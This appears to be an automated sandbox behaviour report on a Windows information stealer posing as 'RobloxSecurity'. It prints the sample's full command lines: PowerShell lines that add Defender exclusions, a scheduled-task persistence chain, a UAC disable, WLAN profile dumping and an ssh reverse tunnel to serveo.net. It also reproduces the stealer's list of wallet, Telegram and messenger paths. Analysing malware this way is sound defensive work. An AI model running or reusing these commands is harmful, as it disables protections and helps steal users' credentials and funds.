Source: Amcache.hve.41.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.41.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.41.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.41.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: vkefq4cv.oil.exe, 00000012.00000002.2063310153.0000010DD583F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: Amcache.hve.41.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.41.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.41.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.41.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.41.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.41.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3543453931.00000167CFE24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: Amcache.hve.41.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.41.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.41.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.41.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000000.1791180656.000001F995EB2000.00000002.00000001.01000000.00000008.sdmp, vkefq4cv.oil.exe.0.dr, vkefq4cv.oil.exe.4.dr	Binary or memory string: qemu'H
Source: Amcache.hve.41.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.41.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.41.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.41.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.41.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.41.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.41.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.41.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.41.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.41.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.41.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.41.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: vkefq4cv.oil.exe, 0000002C.00000002.3000161085.000001EC7F363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: Amcache.hve.41.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Users\user\Desktop\jqOHOuPMJP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.41.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.41.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.41.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.41.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command 